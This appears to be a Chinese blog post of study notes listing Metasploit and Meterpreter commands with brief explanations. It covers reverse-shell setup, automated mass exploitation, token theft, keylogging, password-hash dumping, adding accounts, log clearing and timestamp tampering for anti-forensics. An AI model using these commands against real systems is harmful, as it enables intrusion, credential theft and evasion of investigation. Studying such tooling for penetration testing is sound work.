kali的學習筆記篇(五)metasploit之PC後門參數集

參數列表:


show exploits
列出metasploit框架中的所有滲透攻擊模塊。

show payloads
列出metasploit框架中的所有攻擊載荷。

show auxiliary
列出metasploit框架中的所有輔助攻擊載荷。

search name
查找metasploit框架中所有的滲透攻擊和其他模塊。

info
展示出指定滲透攻擊或模塊的相關信息。

use name
裝載一個滲透攻擊或模塊。

LHOST
你本地可以讓目標主機連接的IP地址,通常當目標主機不在同一個局域網內時,就需要是一個公共IP地址,特別爲反彈式shell使用。

RHOST
遠程主機或是目標主機。

set function
設置特定的配置參數(EG:設置本地或遠程主機參數)。

setg function
以全局方式設置特定的配置參數(EG:設置本地或遠程主機參數)。

show options
列出某個滲透攻擊或模塊中所有的配置參數。

show targets
列出滲透攻擊所有支持的目標平臺。

set target num
指定你所知道的目標的操作系統以及補丁版本類型。

set payload name
指定想要使用的攻擊載荷。

show advanced
列出所有高級配置選項。

set autorunscript migrate -f.
在滲透攻擊完成後,將自動遷移到另一個進程。

check
檢測目標是否選定滲透攻擊存在相應的安全漏洞。



exploit
執行滲透攻擊或模塊來攻擊目標。

exploit -j
在計劃任務下進行滲透攻擊(攻擊將在後臺進行)。

exploit -z
滲透攻擊完成後不與回話進行交互。

exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。

exploit -h
列出exploit命令的幫助信息。

sessions -l
列出可用的交互會話(在處理多個shell時使用)。

sessions -l -v
列出所有可用的交互會話以及詳細信息,EG:攻擊系統時使用了哪個安全漏洞。

sessions -s script
在所有活躍的metasploit會話中運行一個特定的metasploit腳本。

sessions -K
殺死所有活躍的交互會話。

sessions -c cmd
在所有活躍的metasploit會話上執行一個命令。

sessions -u sessionID
升級一個普通的win32 shell到metasploit shell。

db_create name
創建一個數據庫驅動攻擊所要使用的數據庫(EG:db_create autopwn)。

db_connect name
創建並連接一個數據庫驅動攻擊所要使用的數據庫(EG:db_connect user:passwd@ip/sqlname)。

db_namp
利用nmap並把掃描數據存儲到數據庫中(支持普通的nmap語句,EG:-sT -v -P0)。

db_autopwn -h
展示出db_autopwn命令的幫助信息。

db_autopwn -p -r -e
對所有發現的開放端口執行db_autopwn,攻擊所有系統,並使用一個反彈式shell。

db_destroy
刪除當前數據庫。

db_destroy user:passwd@host:port/database
使用高級選項來刪除數據庫。

***metasploit命令***

help
打開meterpreter使用幫助。

run scriptname
運行meterpreter腳本,在scripts/meterpreter目錄下可查看到所有腳本名。

sysinfo
列出受控主機的系統信息。

ls
列出目標主機的文件和文件夾信息。

use priv
加載特權提升擴展模塊,來擴展metasploit庫。

ps
顯示所有運行的進程以及相關聯的用戶賬戶。

migrate PID
遷移到一個指定的進程ID(PID號可通過ps命令從主機上獲得)。



use incognito
加載incognito功能(用來盜竊目標主機的令牌或假冒用戶)

list_tokens -u
列出目標主機用戶的可用令牌。

list_tokens -g
列出目標主機用戶組的可用令牌。

impersonate_token DOMAIN_NAME\\USERNAME
假冒目標主機上的可用令牌。

steal_token PID
盜竊給定進程的可用令牌並進行令牌假冒。

drop_token
停止假冒當前令牌。

getsystem
通過各種攻擊向量來提升系統用戶權限。

execute -f cmd.exe -i
執行cmd.exe命令並進行交互。

execute -f cmd.exe -i -t
以所有可用令牌來執行cmd命令並隱藏該進程。

rev2self
回到控制目標主機的初始用戶賬戶下。

reg command
在目標主機註冊表中進行交互,創建,刪除,查詢等操作。

setdesktop number
切換到另一個用戶界面(該功能基於那些用戶已登錄)。

screenshot
對目標主機的屏幕進行截圖。

upload file
向目標主機上傳文件。

download file
從目標主機下載文件。

keyscan_start
針對遠程目標主機開啓鍵盤記錄功能。

keyscan_dump
存儲目標主機上捕獲的鍵盤記錄。

keyscan_stop
停止針對目標主機的鍵盤記錄。

getprivs
儘可能多的獲取目標主機上的特權。

uictl enable keyboard/mouse
接管目標主機的鍵盤和鼠標。

background
將你當前的metasploit shell轉爲後臺執行。

hashdump
導出目標主機中的口令哈希值。

use sniffer
加載嗅探模式。

sniffer_interfaces
列出目標主機所有開放的網絡端口。

sniffer_dump interfaceID pcapname
在目標主機上啓動嗅探。

sniffer_start interfaceID packet-buffer
在目標主機上針對特定範圍的數據包緩衝區啓動嗅探。

sniffer_stats interfaceID
獲取正在實施嗅探網絡接口的統計數據。

sniffer_stop interfaceID
停止嗅探。

add_user username password -h ip
在遠程目標主機上添加一個用戶。

clearev
清楚目標主機上的日誌記錄。

timestomp
修改文件屬性,例如修改文件的創建時間(反取證調查)。

reboot
重啓目標主機。
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章